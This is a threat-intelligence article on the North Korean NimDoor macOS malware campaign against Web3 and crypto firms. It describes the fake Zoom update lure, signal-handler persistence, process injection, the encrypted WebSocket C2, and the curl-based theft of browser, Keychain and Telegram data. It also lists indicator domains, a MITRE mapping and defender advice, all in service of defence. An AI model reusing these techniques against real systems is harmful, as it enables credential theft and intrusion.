macOS NimDoor Malware: DPRK Hackers Target Web3 and Crypto Platforms with Nim-Based Precision

North Korean threat actors have launched a sophisticated macOS malware campaign targeting Web3 and cryptocurrency companies using a rare Nim-based backdoor known as NimDoor. This evolving cyber offensive, discovered in April 2025 and analyzed by SentinelLABS on 2 July 2025, leverages novel persistence techniques, encrypted communications via WebSockets (wss), and process injection tactics rarely seen in macOS-focused threats.

The campaign begins with social engineering tactics: victims receive Telegram messages from impersonated contacts, who then lure them into fake Zoom meetings via Calendly links. Victims are asked to run a fraudulent “Zoom SDK update script,” which is actually an AppleScript named zoom_sdk_support.scpt hosted on spoofed Zoom-like domains (e.g., support.us05web-zoom[.]forum). This script is intentionally padded with 10,000 lines of whitespace to obfuscate malicious content.

Once executed, it downloads a second-stage payload, initiating a multi-stage infection chain:

• First stage: C++ binary a writes an encrypted payload netchk to disk.
• Second stage: Nim-based binary installer drops further binaries including GoogIe LLC and CoreKitAgent.

Persistence, Evasion, and Exfiltration on macOS

Unprecedented Use of Signal Handlers

CoreKitAgent-compiled from Nim-introduces a novel persistence technique. It hijacks Unix signal handlers SIGINT and SIGTERM to trigger the reinstallation of malware if the system reboots or the process is terminated.

This malware ecosystem features state machines for execution flow, asynchronous task management, and anti-VM tactics including a 10-minute event-driven delay to evade sandbox detection.

Process Injection and WSS-based C2

The C++ binary a injects the malicious trojan1_arm64 into a benign binary named Target. This code injection—rare on macOS—requires elevated entitlements such as com.apple.security.cs.debugger. Communication with the command-and-control (C2) server occurs over wss://firstfromsep[.]online/client, using triple-layered RC4 encryption and custom JSON payloads.

Data Theft from Browsers, Telegram, and Keychain

Scripts Upl and Tlgrm

Two Bash scripts—upl and tlgrm—are responsible for data exfiltration:

• upl targets browsers like Chrome, Brave, Edge, and Firefox, as well as macOS Keychain files.
• tlgrm steals Telegram databases and encryption keys.

Both scripts exfiltrate data to https://dataupload[.]store/uploadfiles using curl.

MEA Impact and Global Implications

Strategic Risks for Web3 and Crypto Firms

Web3 startups in the Middle East and Africa must reevaluate their security postures. The attack highlights how macOS endpoints, often overlooked in corporate networks, are being increasingly exploited.

According to Yusuf Al-Khatib, a regional cybersecurity advisor in Dubai:

“The NimDoor campaign underlines how crypto innovation in MENA is being shadowed by adversarial surveillance. Endpoint hardening must extend beyond Windows.”

With crypto platforms forming part of national economic strategies across Africa and the GCC, attacks like NimDoor may trigger renewed regulatory interest, especially under UAE’s NESA and Saudi Arabia’s ECC regulations.

Global Trend: Malware Authors Flock to Nim

Cross-Platform Languages Are the New Frontier

North Korean groups previously adopted Go and Rust. Now, Nim emerges as a preferred weapon, offering stealth and compile-time function execution. SentinelLABS concludes that Nim’s obscure tooling and unfamiliar structure give attackers a significant edge.

Threat researcher Raffaele Sabato notes:

“NimDoor showcases DPRK’s increasing sophistication on macOS. We’re seeing tactical evolution that outpaces mainstream detection.”

MITRE ATT&CK Mapping & TTPs

- T1566.002 – Phishing: Spearphishing via Service (Telegram)
- T1059.002 – Command and Scripting Interpreter: AppleScript
- T1059.004 – Command and Scripting Interpreter: Bash
- T1055.001 – Process Injection: Dynamic-link Library Injection
- T1071.001 – Application Layer Protocol: WebSockets
- T1556.001 – Modify Authentication Process: Keychain
- T1547.001 – Boot or Logon Autostart Execution: Launch Agent
- T1005 – Data from Local System
- T1027 – Obfuscated Files or Information

Actionable Takeaways for Defenders

1. Restrict AppleScript execution on macOS endpoints using MDM policies.
2. Monitor ~/Library/LaunchAgents and /private/tmp for suspicious binary drops.
3. Detect padding-heavy scripts like zoom_sdk_support.scpt in email attachments.
4. Inspect firewall logs for outbound wss:// traffic from macOS endpoints.
5. Block domains like dataupload.store and writeup.live at DNS/firewall level.
6. Employ behavioral analysis to catch injection attempts like InjectWithDyldArm64.
7. Train SOC teams on Nim-based malware artifacts.
8. Incorporate pentesting exercises simulating macOS attacks.
9. Use YARA rules to hunt for indicators related to CoreKitAgent and GoogIe LLC.
10. Ensure proper security awareness for employees receiving unusual meeting invites or script updates.

Conclusion

The macOS NimDoor campaign is a stark reminder of DPRK’s agility in exploiting emerging technologies. With macOS systems often under-monitored in enterprise settings, this sophisticated attack reinforces the need for layered defenses, cross-platform detection, and proactive threat hunting. The security community must prepare for more stealthy, Nim-based campaigns as attackers seek new frontiers to evade conventional security tools.

Sources

• SentinelLABS: macOS NimDoor Malware Analysis – 2 July 2025
• Huntabil.IT Incident Report – April 2025
• Huntress macOS Threat Research – June 2025
• Validin Threat Feed – Q2 2025
• Nim Programming Documentation
• MITRE ATT&CK Framework
• Cybersecurity trends
• Cybersecurity best practices
• Saintynet Security Services
• Saintynet Pentesting